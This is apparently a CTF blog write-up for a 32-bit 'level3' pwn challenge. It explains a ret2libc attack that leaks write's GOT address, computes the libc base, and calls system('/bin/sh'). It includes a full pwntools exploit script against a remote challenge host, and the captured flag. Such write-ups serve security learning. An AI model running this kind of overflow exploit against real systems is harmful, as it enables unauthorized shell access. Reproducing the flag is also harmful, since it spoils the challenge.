pwn level3

After decompression there are a level3 binary and libc_32.so.6; drag level3 into IDA (32-bit).
The program is essentially these two functions: a write and a read, the classic ret2libc layout.
The basic idea is to use the first overflow to leak the address of write from the GOT, subtract write's offset in libc_32.so.6 to get the libc base address, add the offsets of system and "/bin/sh" found in libc_32.so.6 to get their real addresses, then return to main and overflow a second time. There are many ways to get the offsets of write and system.
Drag libc_32.so.6 into IDA and you can find the offsets of the write function and the system function.
Search for "/bin/sh" (you can also find it with WinHex).
write.plt and main can be found in IDA as well.
In addition to these, I also learned the following method from other people's writeups:

from pwn import *

p = remote('111.198.29.45', 47340)
elf = ELF('./level3')
libc = ELF('./libc_32.so.6')

# write_plt = 0x08048340
write_plt = elf.plt['write']
write_got = elf.got['write']
# main_addr = 0x08048484
main_addr = elf.symbols['main']

# padding + address of write + address of main (return address) + the three arguments of write
payload1 = b'a' * 0x8c + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendlineafter(b"Input:\n", payload1)

# receive the address of write stored in the GOT table
write_real = u32(p.recv()[:4])

# system_off = 0x3a940
system_off = libc.symbols['system']
# bin_off = 0x15902b
bin_off = next(libc.search(b'/bin/sh'))
# write_off = 0xd43c0
write_off = libc.symbols['write']

# compute the libc base address
lib_addr = write_real - write_off
# compute the address of system
system_addr = lib_addr + system_off
# compute the address of '/bin/sh'
bin_addr = lib_addr + bin_off

# padding + system address + 4 bytes of filler (return address of system, irrelevant here) + '/bin/sh' address
payload2 = b'a' * 0x8c + p32(system_addr) + b'aaaa' + p32(bin_addr)
p.sendline(payload2)
p.interactive()

flag:cyberpeace{e808c04302e73cdc5159eef2dcd92f48}

Origin blog.csdn.net/weixin_45677731/article/details/104864676